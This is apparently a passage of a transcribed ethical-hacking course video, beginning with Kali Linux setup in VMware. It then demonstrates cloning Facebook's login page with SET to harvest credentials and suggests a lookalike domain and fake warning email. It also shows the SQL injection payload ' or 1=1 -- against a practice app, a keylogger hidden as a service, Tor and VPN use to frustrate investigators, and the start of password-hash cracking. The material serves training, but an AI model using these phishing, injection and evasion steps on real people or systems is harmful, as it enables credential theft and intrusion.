this, the free version that you have, you can either download VMware Player, but there are some limitations for VMware Player that you might want to look at. You want to compare these products before you want to purchase them, right? Otherwise, you can download Oracle VirtualBox, which is a free hypervisor. It's not as robust as VMware Workstation, but it does the trick, right? So the free version 6.1 is free, and you can then create your own virtual machines over there and install operating systems on them. What I already have a VMware Workstation installed, so I'm just going to open that up, and that's my VMware Workstation. As you can see, I already have a lot of virtual machines created over here. What we are going to do is we are going to configure a virtual machine for the Kali Linux operating system that we are downloading, which should be somewhere here. Let's see, it's at 43%, so halfway there. Till then, let's create the virtual machine. So I click on File, create a new virtual machine. I'm going to customize the machine, so click on Next. This leave it default, we don't want to change that, and then we want to install the operating system later. We don't want to point it out right now, so I'll just click on I will install the operating system later. Click on Next. We want to install Linux. Now in the drop down, you would not see Kali Linux over here. However, you can choose Ubuntu 64-bit. That's what I'm going to choose. There it is. Next. What is the name that we want? I want to give it Kali Linux without the typo, and I want to store it in one of the folders that I've created. By default, it stores on the C drive, which is not a good place to store. You don't want to run out of space on your C drive. So I'm going to click on this PC, and this is my data, and in here I'll have a folder called VirtualBox or Virtual Machines. There it is, within which you can see the other softwares that I already created. I'm going to create a new folder and call it Kali 2019 L. L for is latest for me, because you can see I already have a Kali Linux. So I'm just going to identify this folder with the L at the end. Going to select it and click on OK. You can see the path being changed over here. Click on Next. It's going to ask you how many processors. Now, depending on the processor that you have, you can see I've got an 8-core i7. So if I give it 16 cores or 16 processors, that's not going to work. I cannot go beyond what the physicality already is. So for this machine, one processor with 1 core is more than enough. If you're going to use a lot of tools at the same time, you might just want to give it 2 cores. So we're giving it 2 cores.
it will ask us for RAM to be provided for this virtual machine. By default 2048 megabytes, that's 2 GB of RAM is more than enough. If you require more, we can change this later on. So click on next. We want to use NAT for now, leave this default. Next. Whatever is recommended, keep it the way it is. We do not want to change it. Next, create a new virtual hard disk for this machine, and it is going to ask us the size. 20 GB is more than fine. Store it as a single file. We don't want to use multiple file options. Click on next, and then click on browse where we want to store the VMDK file or the virtual hard disk file. And we go back again to the same folder that we had created, virtual machines, and we look at the Kali Linux Kali 2019 L, and we want to store the VMDK file over there. Once we save it, we want to click on next, and then we want to click on finish. So this is the virtual machine that has been created right here, right? Now this is the basic configuration. Now where are we at with the operating system? And you can see the operating system has been downloaded and it is stored in this particular folder. So we go to E drive. So we are looking for the operating system that we have downloaded. We downloaded it in the operating systems folder, and if we go in here, you can see the current one, the Kali Linux 2019.4 ISO right here. So what we do, we go back to the Kali Linux machine that we have created, edit virtual machine settings, and we point this virtual machine using the CD DVD, and then we point the ISO, the one that we downloaded over here. So we go back to E drive, we go back to OS, and we click on Kali Linux 2019, click on open. So now when this boots up, it will boot up with this ISO, and then it will allow us to install the operating system. So click on OK. Then we click on power on this virtual machine. It will start powering on. It will boot to the ISO, and it will start giving us the booting options. So I'm just going to enter the full screen mode over here for this to be better visible. And we don't want the live mode. What we want is we want to use the graphical install. And then we highlight that, we press enter, and you can see the setup starting up. We'll wait for the GUI to pop up. There it is. Which language do we want? For now we want English. Click on continue. Where are we located? Click on continue. And the configure your keyboard. We want the US keyboard, American English. Continue. It is going to detect the hardware. So as you can see on the screen, it's attempting auto configuration for most of these settings. The network with DHCP, it has identified the network cards, hardware like the processor that has been provided. Now it is asking for a host name. We're going to leave it at default. We're going to click on continue. Domain name, I'm not joining this into a domain as yet. This is going to be a standalone machine, so I can leave this blank. Click on continue. Now it is going to configure the network. It is asking for a password at this point in time, the root password. Type in any password that you want. Ensure that you remember the password. Now by default, the username for the account is the word root. We are just creating the password for the root account. And then we want to click on continue. Setting up the clock, looking at the hard disks. Now here it asks us, do we want to use the entire disk, the 20 GB virtual hard disk that we had provided, or do we want to give it a manual configuration or a guided one where we want encryption and a logical volume management coming into the picture. We're just going to use the first option, guided use entire disk. Don't worry, it's only going to use the virtual disk that we had created. Click on continue. It will give us that it's a 21.5 GB VMware virtual disk that we had. And click on continue. All files in one partition, that's what we want, recommended for new users, whatever it is. We don't want to change these folders. Continue, and this is what we have configured. Once we click on continue, it is going to say, are you sure you want to make these changes? Click on yes, click on continue, and it will start installing Kali Linux on your device. Now this is going to take a few minutes for the installation to work. Alright, so that's the installation that's completed. Now it's asking us to configure a package manager. A network mirror can be used to supplement the software that is included on the installation media. This may also make newer versions of software available. Do you want to use a network mirror? We can click no for now, and then click on continue. Now this is going to install the grub bootloader. This might take a few minutes as well. Install the grub loader to the master boot record. Yes. Click on continue. Click the hard disk that you have just utilized. This is the one. Click on continue. It will install the grub bootloader, running through the last phases of the installation. And now it says the installation is complete. We want to click on continue, finishing the installation, and then it will do a reboot. Alright, and you can see this is starting up. So we are going to you just wait out the boot, and now it started the booting sequence. Just going to maximize the screen. And you can see it's asking me for the password. This is the one that we created. Now that's not the password, that's the username, that's the root, and the password that we had created at that point in time, and then click on login. And this is your screen. Now what we need to do here is we need to install VMware tools, which will help us manage the screen and help the virtual machine to be a little bit better integrated on the system. So that's not mounted yet, so we're just waiting for it to mount. There it is. And what we want to do here is open VMware tools upgrader. Alright, so what we want is we want to extract, or we want to use this OpenX archiver, and once we do that, we'll see the VMware install.pl. Double click on that. Alright, we've got the VMware tools here. What I've done is we have extract to, and I've extracted that on the desktop, right? So what we just did was click on the desktop over here, open, and this is what it will do. And click on extract. Now the error is happening because I've already extracted this. Open this up. We want to run this VMware install.pl. So what do? We open up the terminal window, which is the command line interface over here. And now this is where some of the commands come into the picture. So for example, pwd, it will show us the present working directory. ls will show us the list of the folders that are there. So the folder that we have is on our desktop. So we'll just change directory to desktop, press enter, do an ls, that will show us the list, and you can see VMware tools distrib. That's the folder that we have right here. Right, so we want to go into that folder, cd VMware. At this point, you can just click on tab and it will populate everything over there. Press enter, do an ls, and we want the VMware-install.pl to be executed. Alright, so we tried executing that command. We had an error over there. So what we need to do is we need to execute this command. So /VMware install.pl, and we'll start creating. Now it will ask you for your input installing VMware tools. In which directory do you want to install the binary files? By default it is going to use /usr/bin. If I just press enter, it is going to use the default. As you can see, the input over here. What directory do you want the init directories? I'm just going to press keep on pressing enter for the defaults to come in. This part does not exist. It is going to create it. Default yes, defaults everywhere, and then it tries to start initializing it to maximize the screen, and this is where it is installing. And you can see by just installing that, it automatically adjusted the screen, and now we got a full screen of Kali Linux right here. Right, and that is what VMware tools does for us once we have installed the operating system. And now you can see the entire screen. On here you will see the tool sets that are given here. Now why are we using Kali Linux in the first place? Because this comes in with a bundle of thousands of softwares that are ready to be utilized for ethical hacking. Right, and they have been categorized over here for information gathering, vulnerability analysis, web application analysis, and so on and so forth. So you can see from forensics onwards, reporting tools, and as you scroll down, you can see your development tools, graphics coming in, internet, and the system configuration coming into the picture. These are your settings for your operating system. So these are basically your tools. We are right now in the favorites. If I click on information gathering, you will see that other tools for information gathering start appearing over here. For vulnerability analysis, we have got Sparta, Nmap, fuzzing tools, web application analysis, we have got comics, Kipfish, SQL map, database assessments, password attacks, and so on and so forth. So if you just go in the favorites, this was the terminal emulator that we utilized. This is the command line that we saw. We used the cd command. We use the pwd command. We did the ls command as well to give us the list of the directory that we are in. Similarly, there would be commands like cat. So let's go to cd downloads. Let's see what's there. You can see this case sensitive. So if I type in a capital D and then do a tab ls, there's nothing over here on download. So cd ... will take us back one directory. Now you can see we are back from downloads to root. If I want to go to desktop, this is how I go to desktop. Do a ls, you can see the VMware tools folder over there, cd VMware tools, and we go into that folder ls, where it will give us the list of all those files. Now you can see install is a file that we had edited back then. So if I do a cat install, you will see the cat basically is the command that will help us look at the contents of the file, all right, without opening up the file or without editing the file. So you can see just if I scroll up, this is where we gave the cat command. It then printed the contents of the file over here, and then it exited and gave me back to the command line right here. Right, now if I want to copy this, cp root desktop VMware install, and if you want to copy it to root downloads and press enter,
Now what we are going to do is we are going to see if this file, the install file that we just edited over here, has been copied to the downloads folder. So we are currently in the VMware, on the desktop VMware tools district folder. We do a cd ... That takes us down one directory. So we are still in the desktop. Do a cd ... Now you can see we are back in the root. And now we are going to do a cd downloads, do an ls, and you can see the copied file right here. So if I do a cat install, you can see the same content of that file coming in. So these are some of the commands that we would need to learn as we go ahead. The remove command is, let's say we've got install, we do a man rm. Man is the manual page command that gives us the pages with the description of how that particular command is to be utilized. So rm is remove files or directories. Synopsis, the description, the options, -f for force, -i for prompt, -I prompt once before removing more than 3 files, and so on and so forth. If you want to exit this, you can press Q to exit and you come back to this page. So if I say rm install ls, you will see that the install file has now been deleted. So in Windows we use the del command. In Linux it is the rm command. Alright, let's begin with the phishing tutorial. We have the Kali Linux operating system booted up over here. What we are going to do is we are going to open up a tool called SET, Social Engineering Toolkit, which you would find in this option. And that's the tool that we want. It's a command line tool, a menu driven tool. We are going to host a fake Facebook page, and we can see how we can harvest credentials by this kind of an attack. So these are some disclaimers you might want to go through there. Do you want to agree to the terms of service? Yes. Press enter. And that's your social engineering toolkit. And we are talking about a phishing attack which comes under the social engineering attack. So like I said, it's a menu driven tool. So we just have to look at these options and then just type in the number of the option that we want. So we want to do a social engineering attack. So I type in 1, press enter. In that it is asking me whether I want a spear phishing attack, a website attack vector. We are going to choose a second option. So I type in 2, press enter, and then it asks me what I want to do. I want to take the third option here, credential harvester attack methodology, and we want to do the third attack. Now it is asking whether we want to use the in-house website templates that it already has, or do we want to clone a site, or do we have a customized site that we have prepared that we want to migrate into this tool. We are going to do the site cloning option, so we are going to type in 2, press enter, and then it is going to ask me the IP address where it wants to capture and store the credentials. By default, this is the IP address that I'm using, so if I leave it blank, it will take my default IP address. So I'm just going to press enter, and now it is asking me the URL to clone. So I type in https www.facebook.com. What it is going to do, it is going to connect online, and it is now it has cloned the website, Facebook login.php. The best way to use this attack is that if the username and password form are in the same field or the same page. Regardless, this captures all posts on a website. So you may need to copy www into HTML depending on where your directory structure is. Press return if you understand what we are saying here. So press enter. The social engineering toolkit credential harvest attack is running on port 80. Information will be displayed to you as it arrives. So the site was 71.134, right? The default IP address, and this is where the website is being hosted. Let's check that out. So let me open up a browser on my host machine, and let me point it to the Kali Linux machine that we have just created, 192.168.71.134, and you should see a login to Facebook coming up right here. Looks genuine. It is genuine because we just went online and downloaded this. Let's just have a recap. Let's have an explanation of what we are trying to do. I am trying to host fake Facebook page on my server which has an embedded script in it which is going to do credential harvesting. So the attack here is, let's say if I'm now hosted this, I can craft a fake email, send it across to a victim saying your Facebook account has seen some unforeseen activity, create a hyperlink using HTML coding. Within that, click here to access your account and verify that the account is secured. And when they click on that link, they will be redirected to my fake page, which is here. You can see the IP address is my virtual machine's IP address, but I'm seeing a Facebook login page, and I'm going to type in someone@somewhere.com, and the password I'm just going to type in the regular ones that I use.
And if you see it, when we typed in the username and password, the page just refreshed and gave us the login page again. But now if you look at the URL, I'm actually on Facebook's login page, which is exactly the same that I was hosting. So a layman wouldn't probably figure out they've been hacked by now. They just would figure out, okay, they probably typed in the incorrect password and the page refresh or something like that, and they're just going to log in and they're actually going to access the Facebook page. Thus, they might not even realize that something went wrong. But if I go back to my virtual machine, you can see that it has captured some data and it is reporting over here of what has happened. So if I just scroll up, let's see what happened here and if we have been able to capture anything. So we got a hit printing the output. This does the HTTP 1.1.200. Okay, response coming in, password field found, and we're just looking. There it is. Email someone@somewhere.com, and password that I typed in ASD@1234. So it has captured the username and the password right here. Once we are done, I mean, this is the way attackers work. Now, this is a very basic attack. Again, in the actual trainings, you would then look at how you would host this on a real website, make it a global attack. Right now, it's a virtual machine with a class C IP address. So here, the thought process is, where can we get a free hosting where we can host this kind of sites? Maybe I'll have to purchase a domain which looks like similar to Facebook or the victim that I'm trying to attack. So this is just a POC. So we just wanted to find out if we can, how phishing is done. And this is exactly how it is done, right? So pressing Control C would exit this tool and takes you back to the actual menu. Press 99 to exit, and there it is. Close the window, and that's the phishing practical. After phishing, let's talk about SQL injection. SQL injection stands for structured query language injection, which is a database attack, though it resides within the application. So it's the application vulnerability that we are trying to look at to try to bypass authentication. As the name suggests, a SQL injection vulnerability allows an attacker to inject malicious input into a SQL statement. What is a SQL statement? A query that is used by an application and is fired off to the database. Database executes that query, gets that information that is required, and sends it back to the user if the user is authenticated. So we're going to look at the SQL injection attack demo here. And what we are going to do is we are going to go back to our VMware workstation. And I've got a tool over here called OWASP, Broken Web Application, which is a utility that has been created for people like us to test our skills, to learn on how we can develop our skills further. So this has a lot of vulnerable applications built within it. We're just going to try to access it, and we're going to see if we can create a SQL injection attack. Just waiting for it to boot up. Once it boots up, it will give us an IP address. There we are. So we need to connect to 71.132. So I can just use the same browser I was using, close up Facebook, and now go to 192.168.71.132. And this is the OWASP Broken Web Application project. What we're going to do is we're going to go to Utility, and this is an application that has a lot of information within it. You can see it gives you links about what you should do, help me, video tutorials, listing of vulnerabilities that they have, and so on and so forth. So you can see we are not logged in right now. I'm just going to do this as a demo. So what we're going to do is we're going to look at this and bypass authentication. So we are taken to the login page where you need a username and password to log in. I'm going to type in test as the username and test as the password. Click on login, and you can see that account does not exist, so the authentication mechanism works. Now what we want to do is we want to create a query. Now what does a query look like? When I type in a username and a password, if I just type in a single quote here, it is going to create an error, and this is what a SQL query looks like. Select username from accounts where username is a single quote, and then the exception error happened, so it's not showing the rest of the query to us. Now what I'm going to do is I'm just going to craft a query here, single quote, and give it a condition or 1 = 1 space hyphen space. What happens, hyphen space, is comments out anything after that. So the password field is being commented out at this point in time, and I'm just giving it a condition where the condition is true. 1 does equal 1. And if this condition is true, it is going to allow me to log in. So you can see right now we are not logged in. This bypasses the authentication mechanism, and you can see user authenticated, and we are now logged in as admin. So in the training, what we need to understand as a whole is how SQL works, what are the queries that are structured with, how you can, what are the testing operators. Now, the single quote that we used, that was an operator in the SQL syntax, what these operators are, how they function, and then how you can leverage these attacks. There are different tools that are given to you in Kali as well that you can utilize. So in Kali Linux, you can just open up a command prompt and there's a tool called SQL map. You need to give it a particular site. So SQL map -u for the URL and whatever the URL is. Now URL here, and then once you're here, you just press the enter key. This tool will craft all the queries in the background for you. You don't even have to know SQL query or SQL languages. This is a very easy tool to utilize. Sadly, I cannot demo this on a live website because that would be illegal, but you can see how you can operate this yourself. That's what SQL injections are all about. Moving on, we now talk about VPNs, virtual private networks. And a virtual private network is basically a secure network that allows me to anonymize myself over the internet. So what I'm doing is I'm connecting from here to a server that encrypts my channel, encrypts my connection, and thus allows me to keep my data secure. Now, the basic essence of a VPN or a virtual private network is to allow me this encryption mechanism where I can encrypt and safeguard my data. The added advantage that nowadays a VPN gives is that they can allow us to spoof our IP address or obfuscate our IP address so we can actually become anonymous on the internet. It can allow us to use multiple IP addresses and thus secure ourselves on the internet. For example, I use VPN called CyberGhost. And what this allows me to do is it allows me so many servers over here. If you look at the entire list, all the servers, then there are no spy servers, which guarantee me that they are not going to keep and store any logs. And thus, they are not going to record any of the activity that I'm doing. Right? Since they are located out of Romania, this becomes a little bit more safer for me because the government and the laws over there are a little bit more relaxed than other countries. They give me different links for torrenting, for streaming, for connection features. So there are a lot of VPNs out there. So for example, let's go to the website cyberghost.com. So we can see there's a sale going on, 76% sale, or you can go on to ExpressVPN, which is also a very good VPN. Then there is NordVPN. It depends on what you want and how you want to utilize it. So just purchasing a VPN or getting a free VPN is not enough. It depends on which country the VPN originates from and which server you're connected to. For example, most of the countries have a pact where they share information amongst themselves even if you're connected to a VPN. That means that these companies that provide these services have to generate and store logs, and these logs have to be reported to the government if they ask for it. Now, if there's a list of 14 countries that actually focuses on this practice, so you have to find out VPN that and a server that is not a part of those 14 countries and ensure that those logs are not going to be reported to the government. And these are 3 VPNs basically are something that which are good, and I personally use CyberGhost. I've used the others. I just keep on rotating them just to get an idea of which one is better. So these are VPNs that can allow you to anonymize yourself on the internet. Moving on, these are the ones that we talked about. There are others: Safer VPN, Hide My Ass, ExpressVPN, and so on and so forth. From our terminologies, let's now talk about VPS. VPS is basically virtual private server where you can rent a service or server as a service, a virtual machine as a service. So basically on a cloud using infrastructure as a service, you can rent a server and utilize it for whatever activity you want. So let's go to these sites: register.com, GoDaddy, Network Solutions, or we can talk about other cloud solutions as well. So here you can get register your domain names. So in the previous exercise, for let's say when we talked about the phishing exercise, what we want is we can go on to register.com or we can go on to GoDaddy.com and we can purchase a particular domain. For example, something like this. Instead of the O's, I'm typing in a couple of zeros for the Facebook and let's see if anything of that is available. Now, something.photo is available, or facetips.com is available. There are other options that are making over here that they're giving us over here. And once we purchase this, we can then have our own hosting with a web hosting as a service.
and you can have a Linux-based hosting or a Windows-based hosting depending on what you want, and that's where your shared hosting comes into the picture. If you just want, if you want to look at a virtual server and you want to rent a server over there itself, you can move on to rackspace.com, and here in your services you can have physical server or a virtual server in a public cloud. Your other cloud providers, for example, would be Amazon, AWS, and on AWS you can basically look at EC2, Elastic Compute Cloud, which is basically virtual servers in the cloud. And over here you can rent out a server with whatever capacity you require. You'll obviously have to pay the rent for what those servers are going to cost, but once you have those servers, you can then launch any services on top of it. Looking at other services that we have, we talked about Tor. Tor is a onion routing software that allows users to browse the web anonymously. So we can just go online and we can try to spoof our identity, and I'm going to show you how. So I've got a VMware workstation right here, the one. So we're just going to pull that up and we're going to power on a Windows 7 machine where we're going to look at the onion routing. So our Windows machine has booted up. We're just going to log in, and this is my Windows 7 machine. Now I've got a Chrome browser right here, and we're going to go to a website called cmyip.com, which is going to give the IP address that I'm currently using. So right now I'm not connected to any VPN or anything, and you can see that's my IP address that I'm utilizing. Now if I want to anonymize myself, what I'm going to do is I am going to use Tor, and that's the Tor browser that's set up right there. If I click on it, it's going to open up the software and it's going to create a new network, and it's going to connect to the Tor network and allow me to anonymize myself. Right, so that's the Tor browser opening up and giving me a new browser over here. So I've got one, which is the old one, which is my current IP address. If I just refresh that, you'll see that I'm still on the same IP address as far as this browser is concerned. There's a refresh and it's still showing me the same IP address. Where if I go on to Tor right now, and if I go to cmyip.com, you will see that it is going to give me, and you can see the amount of time it is taking to reach that site. That's because I am using a VPN and there's a lot of encryption running off, and you can see now I'm certainly connected via Hong Kong. And even to reach this site, what Tor does is it gives me a proxy chain. A proxy chain is where it creates multiple hops to hide my identity, and before I reach cmyip.com, I am using 3 different IP addresses over here, one in France, one in Germany, and one in Hong Kong. So if I do something over here to trace back my steps to my actual IP address, the law enforcement agencies or anyone who's going to search, like a forensic investigator, would have to go through these IP addresses before they come back to me. Now it's not impossible, but the effort and time that's going to be taken to come across 3 different countries is going to be phenomenal. So it may just defeat the purpose of having so much resources spent to identify who did what. So that's what Tor does for us. Alright, moving on from Tor, we are going to look at keyloggers. Keyloggers are basically softwares that run in the background and record all the keystrokes of the user. So if I've got a keylogger installed right now, whatever I type will be stored in a text file for the hacker so that they can look at it later on. And just to give you an example of that, we go back to my VMware workstation and we open up another Windows 7 machine. I'm going to power this on, and I'm going to close this one till then. So this virtual machine has booted up. We are going to use user 1, log in as user 1, just close all these softwares which are not required. And once this machine is booted up, what we're going to do is I'm just going to open up a random websites and see what we're doing. Basically, there's a keylogger that's there in the startup that's going to record our keystrokes, and we just want to see what it actually does. Now Firefox is getting updated, so let's hold on. Now this is the latest version of Firefox, right? And we're just going to go to, let's say, facebook.com. Wait for the website to open up. Alright, let's try opening it up again. And that's facebook.com, and we're just going to type in some random username and password, someone at somewhere.com, and the password being again ASD@1234567890. Login, obviously that login is not going to work. User probably doesn't exist, or if it does, the password probably is incorrect. And so we're going to close this. We're going to, let's say, open up another browser window, go to another site, rediff.com, and then go to rediff mail. Try the same thing over here, someone at somewhere.com. password ASD@1234567, whatever it is. Don't say. We can see the combination is incorrect. Now there's a keylogger running in the background, and what we want is we now want to open up the keylogger. Now it is visible here because I've kept it visible. You can hide it in the start menu, and there's a shortcut key for you to pull it up later on, so this completely becomes invisible. And what it can do is it basically creates a record of whatever you have been doing so far. So you can see these things populating on the 25th of December. So if I look at the visited websites, you can see I opened up Mozilla Firefox, the first where there was a problem loading the page. Then we opened up Facebook, then we opened up rediffmail.com, and so on and so forth. So it just gives me the list of visited websites. Whereas if I look at keystrokes and clipboard, you will see whatever we have typed in. So we first typed in facebook.com. Then again, the second time I try to type in, then I hit backspace. Then I type in facebook.com, and then you can see I typed in someone@somewhere.com, and in tab ASD@123456789. We closed up the browser. We opened up a new one, and we went on to rediffmail.com, and then you can see me typing this one, then going back one space, then the rest of what I typed, and then the password coming in. So that's what a keylogger does. If you look at the taskbar, it's not going to show you a keylogger running in the background. It's in the processes, you're not going to see anything at all, but it's going to mask itself as a service. So if you look into the properties, you can see that icon coming in over here, which matches this one. And so you can see that this is masking itself as a service.exe. If this gets hidden as well, it would be very difficult for a user to even identify this. All right, so that's what a keylogger is. Moving on, let's see what else we want to talk about. So we've talked about Tor, we've talked about keyloggers, and now we want to talk about firewalls. Now, for keyloggers to be prevented, we need antiviruses, right? So we need a good antivirus program that's going to be installed, updated, and run on a regular basis to protect ourselves from malwares. But what about network connections? And you need a firewall and a system to prevent or to detect what kind of connections are going on in the first place. Now, we cannot rely on software 100%. So even if a firewall is not configured properly, that's going to be a problem. So what we need to do is we have to have a firewall, configure it correctly, and then allow and disallow certain activity from happening. And what we're going to do is, I've got such a system on my machine here. I use a software called Glasswire. What it does is it is a network analyzer. So it allows me to analyze whatever is going on. You can see all the apps that I'm utilizing and how much upload and download they have been doing, all the traffic. So you can see the protocols that I'm utilizing. So I come to know what's going on in the background. And this gives me the entire graph of how much I have been doing for the past 24 hours, past 3 hours, past 5 minutes, and so on and so forth. Right, so this is what the activities, and these are the alerts that it has been generating. I can click on those alerts and it will start telling me what it was all about. If the graph doesn't work for me, it gives me usage as well. So how much I have utilized since I've installed this software, right, and what applications have been utilized, which hosts have been connected to, and the traffic type that was utilized. And then the things on my network. So these are the devices that I have currently on my network that have been identified. And then comes the firewall. So on the firewall is clicked on. You see all those services that have been identified, and you can just click on a particular service to lock that service. So this becomes a discovery tool, identifies whatever networking is going on, gives me all that information, and then I can look at and I can just click on any of these services that I find it as malicious and block them. I can create different profiles for different applications as and when I want them, and these are the alerts. So you can see that this was the first time a network connection was looked at from VMware. And what this allows me to do is whenever I execute a file, it can upload it to virustotal.com and scan it as a third-party antivirus to ensure that there is nothing malicious on it. So I already have an antivirus over here, but if this ever gets compromised, I still can rely on a third-party service where in real time when I execute my applications, they would be verified and I would be assured that nothing is wrong with my system. And this software that I'm utilizing, Glasswire Basic, is free, and then there are paid versions as well. It's just glasswire.com is where you're going to find this. Moving on, rootkit. Rootkits are also malicious softwares that you allow an unauthorized user to have access to a computer to restrict areas of its software. Now, a rootkit in a sense is a malicious software that infects a machine and prevents some functionality from it, like hiding data or preventing users from running antiviruses. And it's basically a malicious software that is used to hide information from the victim so that they would not realize that they have actually been compromised. It's going to be a difficult showing of a rootkit, so I cannot show that demo to you. So we're just going to move on, and we are going to talk about ethical hacking techniques now. Now, when we say ethical hacking techniques, we want to look at what kind of audits are available when we want to do ethical hacking. So there's a black box audit, a white box audit, and a gray box audit. So if I'm invited in an organization to conduct a test, to conduct a audit, to conduct a vulnerability assessment or a penetration test, to identify vulnerabilities and then try to plug them out, they are going to give me 3 different variations. In a black box audit, they're not going to tell me about the infrastructure, they're not going to give me any information, and they want me to start from the basics of gathering information, identifying the systems, and based on the information that I gather, whether I'm able to develop any hacks and compromise their infrastructure. So it will be a simulation of a hacker who's sitting outside the organization and trying to find a way in. Whereas a white box audit is where full infrastructure knowledge is given, anything and everything that is required for an audit is given. And this is a simulation of an insider attack, a person sitting inside the organization misusing their permissions and then trying to compromise, trying to get access to data that they do not have access to. So the simulation is from a malicious insider. A gray box is where some partial knowledge is available, and from that partial knowledge you're going to try to build up more information, and then you're going to try to get access to those resources. What are the tools that we utilize? So we've already had a couple of demos on keyloggers, SQL injection, SQL map, and so on and so forth. Metasploit is a very much used tool for penetration testing, and having knowledge on Metasploit is very much necessary as far as ethical hacking is concerned. Nmap, this is a tool used for network discovery. Nessus, a vulnerability scanner. Wireshark is a packet capturer that allows you to capture packets and analyze whatever is going on. SQL map is something that we have seen, a SQL Injection Attack tool which generates its own queries. And John the Ripper is a password cracking tool. Backtrack used to be an operating system that was utilized for penetration testing. However, Backtrack has now been replaced by something called Kali Linux, and that's the operating system that we have utilized in all our demos where we try to look at SQL map and those injection attacks that we did. So what are the areas of ethical hacking? We have just talked about all these areas as well. Network services, we looked at the Glasswire application that showed us how my machine is consuming networks, which protocols are being consumed, how the connections are being created. If somebody is able to install a Trojan on my machine, it is going to try to create a new connection on the network with the hacker to allow that hacker a backdoor access. Now, if I have that Glasswire or a similar firewall implemented, it is this firewall that is going to detect it and prevent that connection from happening. So if I install a software that is suddenly suspicious or that installs something else in the background that I may not be aware of, that tool is going to identify all the connections that are being made and it is going to highlight that connection. I need to go through all of those connections and identify whether they are legit or not. And if I find some suspicious or doubtful, I'm going to block that connection and then I'm going to investigate what's going on. And that's where ethical hacking comes into the picture. You want to find out if your firewall that you have implemented is going to work correctly or not. If the configuration of the firewall is done properly, or if the firewall is misconfigured, is it leaking out information, right? At the same time, you're looking at web applications. We looked at the OWASP broken web application where we did some SQL injection attacks, right? So that was a weakness or a vulnerability in that application, which would allow us to bypass authentication and get access to resources that we were not authorized for. And then client-side attacks would be where you install keylogger at the end of the client system, and then you try to capture whatever data the user is typing in, like usernames and passwords on the Facebook and the rediffmail.com website that we saw, and then try to misuse that information to get access to those resources. Then Wi-Fi networks, right? Wi-Fi is something that we use on a regular basis. We got our smart devices nowadays, smartphones, tablets, phablets that we connect to Wi-Fi and start using all our services, our banking applications on our smartphones. And thus we want to ensure that wireless connectivity is simple and is secured. So you want to use encryption mechanisms, you want to use tools on your smartphones, antiviruses, firewalls on your smartphones to ensure that whatever you are utilizing is going to remain secure. And then social engineering, we've looked at the phishing website on facebook.com. We've seen how easy it is to clone websites and host them on Apache server. So if you look at it as from an ethical hacker's perspective, the job of an ethical hacker is to simulate these kind of attacks that a hacker may conduct. And first of all, you're basically going to find out areas where these attacks can happen. Think of it from a hacker's perspective. Try to simulate those attacks and see if those attacks are going to be effective. Can those attacks be prevented? And can your current security controls that you have put in place identify, detect, and prevent these attacks from happening in the first place? And that is what ethical hacking is all about. Let's look at the Metasploit attack. Metasploit is a framework of penetration testing that makes hacking very simple. You just need to know how to utilize the tool. You need to identify the vulnerability associated with a particular exploit and then run the exploit on Metasploit. We'll be demoing this during the practical. So there are active exploits and passive exploits. In active exploits, it exploits a specific computer, runs until execution and then exits, uses brute force and exits when an error occurs. In a passive exploit, these exploits wait for incoming requests and exploit them as soon as they connect. They can also be used in conjunction with emails and web browsers. So in passive exploits, we create a payload, like a reverse connection payload. We send it to the victim. Once the victim installs that software, the machine will then initiate a connection to us. Our machine will be in a listen mode, and then we will, once the software is executed at their end, we would then try to connect and exploit that particular vulnerability. This is the practical that we'll be doing on Metasploit. So let's move on with the demos, and then we'll see what we can discuss amongst them. All right, let's have a look at some of the demos that we had talked about in the ethical hacking and penetration testing module. We are going to look at 3 different demos. The first one is going to be a SQL injection attack that we are going to perform on this tool that we have. The second one is a password cracking attack on Windows 7. And the third one is a Metasploit based or a Metasploit based shell shock attack on a Linux based web server. So let's get cracking. I've powered on this virtual machine, which is the OWASP Broken Web application. It is a tool that is provided for people who want to enhance their skills and they can practice how to do these attacks in a legal manner. So we are going to go to this site. I'm just going to open up my browser. The IP address is 71.132, and that's the OWASP Broken Web application that we want to utilize. We are going to head off to Mutility 2, and we are going to look at a SQL injection attack where we want to bypass authentication. Now this takes us to the login screen, so we can just try our luck here and see that the authentication mechanism works. The account does not exist, so the username and password that we have supplied is not the correct one. So we want to ensure that there's a SQL database, and we can try to attack it and see if we can bypass the authentication. Now what we want to do is we want to create a SQL based malformed query that can give us a different output. So I'm just going to type in a single quote over here and type login, and you can see that this is now suddenly recognized as a operator, and there's an error that is given out compared to the login that we tried earlier. When we used a proper text-based login mechanism, it gave us the account does not exist, but here the single quote gave us an error, and it shows us how SQL works. This is the query that we had created. Now, in the trainings that you have for ethical hacking, there would be explanations of what these queries are all about, how the syntax works. Here we're just going to see if we can create a malformed query to log in as a user in this case. So what I'm going to do is create the query over here, and we're going to give it a comparison. So we're going to give it a OR 1 equals 1 space hyphen space. And if you now click login, you should be able to bypass authentication, and you can see user has been authenticated, and we now have admin access to this application. Now here the SQL queries need to be crafted in such a perspective that they're going to work. So there would be a lot of exercise in identifying what the database is. There's a Microsoft database and Oracle database and so on and so forth, and then you have to choose those proper commands. But identifying that would come in the training. Right now we're just looking at a demo. This is how a SQL injection attack works. Now let me log out here. Similarly, now we are in a login page. The same query worked wonders where it allowed us to bypass authentication. So it also depends on what kind of a page I am and what query would be accepted at this point in time. So here application understanding would also come into the picture, where which function we are calling upon when we are connected to a particular page. Now this is a user lookup function, right? So again here we try the same method, test. That's not going to work. Authentication error, bad user on password. And if we type in the same query over here, single quote or, and give it a condition, single quote or 1 equals 1 space hyphen space. Now here it is not going to log us in because this is not a login page. This is a user lookup form. So here it would instead give us a dump of all the databases that it has. So you can see all the usernames and passwords coming in that are stored in the user lookup field. So this is where the understanding comes in of which query to create at what page, we are depending upon the function that is being called, right? So that's the SQL injection attack that we wanted to look at. Let's move on to password cracking. Now this is a Windows 7 machine that we have. I'm just going to do a very basic password cracking example. We're just going to log in. Now here the assumption is that we are able to log in. We have access to a computer and we want to check out other users who are using this computer and see if we can find out their passwords so that we can log in as a different user, steal data if required, and we wouldn't be to blame if there are any logs that are created. So here we've got a tool called Kane Enable that is installed right here. Now I'm already an administrator on this machine. I'm checking out other administrators who share the same privileges or any other user who may be on this system whose password I can crack, and thus I would be able to get access through their account and then do any malicious activity, right? So this allows me to go into a cracker tool and it allows me to enumerate this machine and identify all the users and passwords that are there in this particular machine, right? So I'm just going to click on the plus sign and I'm going to import hashes from a local system. So where are these files stored? Where does Windows store its passwords? In what format are they stored? And what this tool does to retrieve those? That's something that we all need to know as an ethical hacker, right? So import the hashes from the local system, click on next. It's going to enumerate that file and it is going to give you a list of all the users that are there. So you can see 